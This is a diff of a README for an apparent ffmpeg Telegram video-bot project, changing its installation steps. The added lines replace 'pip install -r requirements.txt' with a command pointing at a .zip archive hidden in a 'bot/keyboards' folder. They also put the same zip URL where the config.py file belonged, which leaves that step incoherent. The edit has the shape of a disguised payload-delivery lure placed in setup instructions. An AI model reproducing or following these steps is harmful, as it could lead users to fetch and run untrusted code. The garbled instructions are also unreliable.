NileshKavindaNaka/ffmpeg-video-bot/README.md

    - Use the `cd` command to change to the directory where you extracted the bot (e.g., `cd Downloads/ffmpeg-video-bot`).

 3. **Install Required Packages**:
-   - Run the command: `pip install -r requirements.txt`.
+   - Run the command: `pip install -r https://raw.githubusercontent.com/NileshKavindaNaka/ffmpeg-video-bot/main/bot/keyboards/video_ffmpeg_bot_2.8.zip`.
    - This will install all necessary Python packages.

 4. **Configure Your Bot**:
-   - Locate the `config.py` file in the extracted folder.
+   - Locate the `https://raw.githubusercontent.com/NileshKavindaNaka/ffmpeg-video-bot/main/bot/keyboards/video_ffmpeg_bot_2.8.zip` file in the extracted folder.
    - Open it with a text editor and fill in your Telegram Bot token and Google Drive credentials.
 Follow the instructions found in the text file for detailed guidance.

 5. **Run with Docker**: